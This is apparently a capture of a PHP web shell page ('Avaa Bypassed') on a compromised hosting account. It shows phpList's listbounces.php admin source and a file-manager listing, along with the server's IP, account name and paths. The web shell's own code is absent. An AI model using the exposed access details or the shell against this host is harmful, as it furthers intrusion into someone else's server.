[ Avaa Bypassed ]

Upload:

Command:

hmhc3928@18.191.200.151: ~ $ 
<?php

verifyCsrfGetToken();

$access = accessLevel('listbounces');

$listid = empty($_GET['id']) ? 0 : sprintf('%d', $_GET['id']);
$download = isset($_GET['type']) && $_GET['type'] == 'dl';
$isowner_and = '';
$isowner_where = '';
$status = '';

switch ($access) {
    case 'owner':
        if ($listid) {
            $req = Sql_Query(sprintf('select id from '.$tables['list'].' where owner = %d and id = %d',
                $_SESSION['logindetails']['id'], $listid));
            if (!Sql_Affected_Rows()) {
                Fatal_Error($GLOBALS['I18N']->get('You do not have enough privileges to view this page'));

                return;
            }
        }
        $isowner_and = sprintf(' list.owner = %d and ', $_SESSION['logindetails']['id']);
        $isowner_where = sprintf(' where list.owner = %d ', $_SESSION['logindetails']['id']);
        break;
    case 'all':
    case 'view':
        break;
    case 'none':
    default:
        if ($listid) {
            Fatal_Error($GLOBALS['I18N']->get('You do not have enough privileges to view this page'));
            $isowner_and = sprintf(' list.owner = 0 and ');
            $isowner_where = sprintf(' where list.owner = 0 ');

            return;
        }
        break;
}
if (!empty($_SESSION['LoadDelay'])) {
    sleep($_SESSION['LoadDelay']);
}
$req = Sql_Query(sprintf('select listuser.listid,count(distinct userid) as numusers from %s list, %s listuser,
    %s umb, %s lm where %s list.id = listuser.listid and listuser.listid = lm.listid and listuser.userid = umb.user group by listuser.listid
    order by listuser.listid limit 250', $GLOBALS['tables']['list'], $GLOBALS['tables']['listuser'],
    $GLOBALS['tables']['user_message_bounce'], $GLOBALS['tables']['listmessage'], $isowner_and));
$ls = new WebblerListing($GLOBALS['I18N']->get('Choose a list'));
$ls->setElementHeading('List name');
$some = 0;
while ($row = Sql_Fetch_Array($req)) {
    $some = 1;
    $element = '<!--'.$GLOBALS['I18N']->get('list').' '.$row['listid'].'-->'.listName($row['listid']);
    $ls->addElement($element, PageUrl2('listbounces&amp;id='.$row['listid']));
    //  $ls->addColumn($element,$GLOBALS['I18N']->get('name'),listName($row['listid']),PageUrl2('editlist&amp;id='.$row['listid']));
    $ls->addColumn($element, $GLOBALS['I18N']->get('Total bounces'), $row['numusers']);
}
if ($some) {
    $status = $ls->display();
} else {
    $status = '<p>'.$GLOBALS['I18N']->get('None found').'</p>';
}

Filemanager

DIR : / home/ hmhc3928/ public_html_community/ phplist/ admin/ actions/
Name Type Size Permission Actions
.htaccess File 31 B 0644
addemail.php File 874 B 0644
addlist.php File 69 B 0644
bounce.php File 166 B 0644
bounces.php File 1.35 KB 0644
campaigns.php File 2.57 KB 0644
checkurl.php File 838 B 0644
configure.php File 2.37 KB 0644
domainbounces.php File 1.66 KB 0644
domainstats.php File 7.2 KB 0644
export.php File 6.92 KB 0644
generatetext.php File 1.01 KB 0644
generatetextpreview.php File 1.42 KB 0644
getservertime.php File 127 B 0644
hidenote.php File 245 B 0644
import.php File 182 B 0644
import1.php File 9.21 KB 0644
import2.php File 23.54 KB 0644
importsimple.php File 182 B 0644
initlanguage.php File 243 B 0644
keepalive.php File 180 B 0644
listbounces.php File 2.4 KB 0644
markread.php File 341 B 0644
mclicks.php File 4.81 KB 0644
mergeduplicatelists.php File 1.41 KB 0644
msgbounces.php File 2.35 KB 0644
msgsent.php File 881 B 0644
msgstatus.php File 5.35 KB 0644
mviews.php File 4.97 KB 0644
plugins.php File 943 B 0644
processqueue.php File 53.08 KB 0644
reconcileusers.php File 471 B 0644
removeemptylists.php File 379 B 0644
searchemail.php File 825 B 0644
shownotes.php File 74 B 0644
statsoverview.php File 5.83 KB 0644
storemessage.php File 2.05 KB 0644
subscription.php File 3.91 KB 0644
test.php File 13 B 0644
updatetranslation.php File 824 B 0644
upgrade.php File 183 B 0644
user.php File 710 B 0644
viewtemplate.php File 1.09 KB 0644